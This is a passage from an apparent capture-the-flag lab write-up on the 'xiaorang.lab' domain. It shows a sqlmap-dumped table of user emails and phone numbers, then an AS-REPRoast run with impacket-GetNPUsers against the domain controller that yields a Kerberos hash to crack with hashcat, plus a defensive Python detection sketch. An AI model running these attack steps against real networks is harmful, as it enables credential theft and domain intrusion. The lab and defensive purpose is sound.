| 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN |
| 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU |
| 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU |
| 266 | maqun@xiaorang.lab | 15235945624 | MA QUN |
| 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO |
| 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN |
| 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN |
| 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN |
| 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG |
| 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE |
| 273 | luyue@xiaorang.lab | 18299785575 | LU YUE |
| 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN |
| 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN |
| 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG |
| 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG |
| 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE |
| 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN |
| 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN |
| 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN |
| 282 | yexing@xiaorang.lab | 13719043564 | YE XING |
| 283 | maoda@xiaorang.lab | 13878840690 | MAO DA |
| 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI |
| 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN |
| 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU |
| 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU |
| 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN |
| 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU |
| 290 | yixue@xiaorang.lab | 18451603140 | YI XUE |
| 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN |
| 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN |
| 293 | lefen@xiaorang.lab | 13271196544 | LE FEN |
| 294 | yubo@xiaorang.lab | 13462202742 | YU BO |
| 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI |
| 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN |
| 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN |
| 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG |
| 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU |
| 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG |
| 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN |
| 302 | diyan@xiaorang.lab | 18534028047 | DI YAN |
| 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU |
| 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN |
| 305 | fandi@xiaorang.lab | 15846960039 | FAN DI |
| 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN |
| 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI |
| 308 | didi@xiaorang.lab | 13413041463 | DI DI |
| 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN |
| 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN |
| 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU |
| 312 | xundi@xiaorang.lab | 18358493414 | XUN DI |
| 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN |
| 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE |
| 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI |
| 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO |
| 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI |
| 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI |
| 319 | yufen@xiaorang.lab | 18432795588 | YU FEN |
| 320 | jiyi@xiaorang.lab | 13574211454 | JI YI |
| 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO |
| 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E |
| 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI |
| 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN |
| 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN |
| 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN |
| 329 | oulun@xiaorang.lab | 13402760696 | OU LUN |
| 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG |
| 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG |
| 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE |
| 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI |
| 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI |
| 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE |
| 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING |
| 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO |
| 338 | guhui@xiaorang.lab | 15166711352 | GU HUI |
| 339 | baoai@xiaorang.lab | 15837430827 | BAO AI |
| 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO |
| 341 | xingye@xiaorang.lab | 13367587521 | XING YE |
| 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI |
| 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG |
| 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI |
| 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO |
| 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN |
| 347 | luxing@xiaorang.lab | 18318675030 | LU XING |
| 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN |
| 349 | duyue@xiaorang.lab | 15515878208 | DU YUE |
| 350 | xijun@xiaorang.lab | 17871583183 | XI JUN |
| 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING |
| 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO |
| 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG |
| 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU |
| 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING |
| 356 | luhong@xiaorang.lab | 17766091079 | LU HONG |
| 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE |
| 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN |
| 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG |
| 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU |
| 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI |
| 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING |
| 363 | xiai@xiaorang.lab | 18148404789 | XI AI |
| 364 | bihe@xiaorang.lab | 13628593791 | BI HE |
| 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI |
| 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG |
| 367 | pangning@xiaorang.lab | 13443921700 | PANG NING |
| 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI |
| 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN |
| 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE |
| 371 | mayong@xiaorang.lab | 15622971484 | MA YONG |
| 372 | hangda@xiaorang.lab | 15937701659 | HANG DA |
| 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU |
| 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN |
| 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU |
| 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN |
| 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG |
| 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO |
| 379 | heli@xiaorang.lab | 13701347081 | HE LI |
| 380 | haoming@xiaorang.lab | 15049615282 | HAO MING |
| 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI |
| 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE |
| 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN |
| 384 | linxi@xiaorang.lab | 18052976097 | LIN XI |
| 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU |
| 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING |
| 387 | qiai@xiaorang.lab | 18154690198 | QI AI |
| 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN |
| 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG |
| 390 | huaren@xiaorang.lab | 13307653720 | HUA REN |
| 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI |
| 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN |
| 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN |
| 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI |
| 395 | sunli@xiaorang.lab | 18233801124 | SUN LI |
| 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN |
| 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG |
| 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO |
| 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU |
| 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN |
| 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN |
| 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN |
| 403 | hualu@xiaorang.lab | 13641470801 | HUA LU |
| 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING |
| 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO |
| 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI |
| 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN |
| 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN |
| 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN |
| 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN |
| 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI |
| 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO |
| 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI |
| 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI |
| 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG |
| 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN |
| 417 | yetai@xiaorang.lab | 13400150018 | YE TAI |
| 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE |
| 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN |
| 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG |
| 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG |
| 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN |
| 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN |
| 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI |
| 425 | niuya@xiaorang.lab | 13915041589 | NIU YA |
| 426 | guwei@xiaorang.lab | 13584571917 | GU WEI |
| 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN |
| 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN |
| 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN |
| 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN |
| 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU |
| 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU |
| 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN |
| 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU |
| 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG |
| 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI |
| 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG |
| 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG |
| 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO |
| 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO |
| 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE |
| 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG |
| 443 | xudi@xiaorang.lab | 18498838233 | XU DI |
| 444 | wulun@xiaorang.lab | 18350490780 | WU LUN |
| 445 | yuling@xiaorang.lab | 18835870616 | YU LING |
| 446 | taoya@xiaorang.lab | 18494928860 | TAO YA |
| 447 | jinle@xiaorang.lab | 15329208123 | JIN LE |
| 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO |
| 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI |
| 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO |
| 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE |
| 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING |
| 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN |
| 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI |
| 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG |
| 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG |
| 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU |
| 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN |
| 459 | yurui@xiaorang.lab | 15764121637 | YU RUI |
| 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU |
| 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN |
| 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE |
| 463 | wohong@xiaorang.lab | 18404022650 | WO HONG |
| 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI |
| 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG |
| 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI |
| 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN |
| 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU |
| 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN |
| 470 | qijie@xiaorang.lab | 15631483536 | QI JIE |
| 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING |
| 472 | xiqi@xiaorang.lab | 18938747522 | XI QI |
| 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG |
| 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU |
| 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA |
| 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE |
| 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA |
| 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN |
| 479 | jiyu@xiaorang.lab | 18650881187 | JI YU |
| 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG |
| 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN |
| 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN |
| 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN |
| 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE |
| 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO |
| 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN |
| 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG |
| 488 | songming@xiaorang.lab | 13220512663 | SONG MING |
| 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN |
| 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI |
| 491 | youyi@xiaorang.lab | 18036808394 | YOU YI |
| 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU |
| 493 | fuyi@xiaorang.lab | 15632151678 | FU YI |
| 494 | linli@xiaorang.lab | 17883399275 | LIN LI |
| 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE |
| 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN |
| 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI |
| 498 | siyi@xiaorang.lab | 17873307773 | SI YI |
| 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN |
| 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG |
+-----+----------------------------+-------------+-----------------+

[17:45:56] [INFO] table 'oa_db.oa_users' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv'
[17:45:56] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:45:56 /2025-11-16/

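The admin account is probably just a user on the current machine and is of little use. The users table contains a large number of users whose addresses end in @xiaorang.lab, which are suspected to be domain users.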

flag3

The next step is Kerberos brute-force.

Extract all the email addresses.


Use the collected users to run an AS-REPRoast attack against the domain controller, that is, host 12 (172.22.6.12).
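Seen from the domain controller, this step is a burst of TGT requests for unknown principals from one source, followed by a ticket issued without pre-authentication. The sketch below is an added example, not part of the original writeup: it flags that pattern and lists accounts carrying the UF_DONT_REQUIRE_PREAUTH bit. The records are constructed, simplified stand-ins for Security event 4768 fields, and every host, account name and threshold in it is an assumption.

```python
from collections import defaultdict
from datetime import datetime

# Documented Windows values (Security event 4768 and userAccountControl).
STATUS_OK = "0x0"
STATUS_PRINCIPAL_UNKNOWN = "0x6"    # KDC_ERR_C_PRINCIPAL_UNKNOWN
PREAUTH_NONE = "0"                  # TGT issued without pre-authentication
PREAUTH_ENC_TIMESTAMP = "2"         # normal password logon
ETYPE_RC4_HMAC = "0x17"             # etype 23, the "23" in a $krb5asrep$23$ hash
ETYPE_AES256 = "0x12"
UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit


def ev(t, ip, user, status, preauth="-", etype="-"):
    """Build one simplified 4768 record (this dict layout is an assumption)."""
    return {"time": datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), "ip": ip,
            "user": user, "status": status, "preauth": preauth, "etype": etype}


# Constructed sample events; hosts and account names are made up.
SAMPLE_EVENTS = [
    ev(f"2025-01-01 10:00:0{i}", "10.0.0.5", f"nouser{i}", STATUS_PRINCIPAL_UNKNOWN)
    for i in range(6)
] + [
    ev("2025-01-01 10:00:07", "10.0.0.5", "legacy.user", STATUS_OK,
       PREAUTH_NONE, ETYPE_RC4_HMAC),
    ev("2025-01-01 10:05:00", "10.0.0.9", "alcie", STATUS_PRINCIPAL_UNKNOWN),  # one typo
    ev("2025-01-01 10:05:10", "10.0.0.9", "alice", STATUS_OK,
       PREAUTH_ENC_TIMESTAMP, ETYPE_AES256),
    ev("2025-01-01 11:00:00", "10.0.0.9", "legacy.user", STATUS_OK,
       PREAUTH_NONE, ETYPE_AES256),
]

# Constructed directory export: (sAMAccountName, userAccountControl).
SAMPLE_DIRECTORY = [
    ("alice", 0x200),            # NORMAL_ACCOUNT
    ("bob", 0x10200),            # NORMAL_ACCOUNT + DONT_EXPIRE_PASSWD
    ("legacy.user", 0x400200),   # NORMAL_ACCOUNT + DONT_REQUIRE_PREAUTH
]


def find_enumeration(events, window_s=60, min_names=5):
    """Map source IP -> largest number of distinct unknown principals it
    requested inside any window of window_s seconds (only if >= min_names)."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == STATUS_PRINCIPAL_UNKNOWN:
            by_ip[e["ip"]].append((e["time"], e["user"].lower()))
    hits = {}
    for ip, items in by_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Shrink the window from the left until it spans <= window_s.
            while (items[end][0] - items[start][0]).total_seconds() > window_s:
                start += 1
            names = {name for _, name in items[start:end + 1]}
            if len(names) >= min_names:
                hits[ip] = max(hits.get(ip, 0), len(names))
    return hits


def find_no_preauth_tgts(events):
    """Successful TGT requests answered without pre-authentication."""
    return [e for e in events
            if e["status"] == STATUS_OK and e["preauth"] == PREAUTH_NONE]


def triage(events, window_s=60, min_names=5):
    """Return (enumerating sources, alerts). A no-preauth ticket is rated
    'high' when its source also enumerated names, otherwise 'medium'."""
    enum = find_enumeration(events, window_s, min_names)
    alerts = []
    for e in find_no_preauth_tgts(events):
        alerts.append({
            "user": e["user"],
            "ip": e["ip"],
            "rc4": e["etype"] == ETYPE_RC4_HMAC,
            "severity": "high" if e["ip"] in enum else "medium",
        })
    return enum, alerts


def roastable_accounts(directory):
    """Accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set."""
    return sorted(name for name, uac in directory
                  if uac & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    sources, alerts = triage(SAMPLE_EVENTS)
    print("enumerating sources:", sources)
    for alert in alerts:
        print("no-preauth TGT:", alert)
    print("accounts to fix:", roastable_accounts(SAMPLE_DIRECTORY))
```

Clearing the flag on every account that `roastable_accounts` returns removes the condition this step depends on.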

┌──(root㉿kali)-[/home/kali]
└─# proxychains -q impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User chengqiu@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User louyou@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User maqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenbiao@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User weishengshan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72d2bae127798ec3ab56405067b72fb3$f32f22f2de9cbec10e31d36d94bc609623e0754e1a53d2270e6ee291688f5de431ca42fd35d5970f714e0e335c7ad2cb4b8b58c99c557a40f206f44c6c69ac701a59dd9cfb7bee01c1153efa86aebdc93f1eecab9e29d6427e1f9c85115951b619418d9a9a52f6ac4dfb96955179ce31b9b86d716f2f12f5f717ac4eea46c6d10b2dc91adc5f6eb4cfa0dd520153122ac52445454ea65ed1417168868097457d50b2570077a3f28c55eb39f053e7fc87fb46b75c25b4585300929e89fb8338dd95e98dda3eb9d44a9f2562aef5d793987e0f4651a02c336412d47b393336af5107ca6c235197be1ec6e933e0
[-] User chuyuan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenliang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yulvxue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User luyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pangzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guohong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lezhong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sheweiyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dujian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lidongjin@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hongqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yexing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User maoda@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qiaomei@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

One account returned a hash, so crack the password directly with hashcat.

┌──(root㉿kali)-[/home/kali]
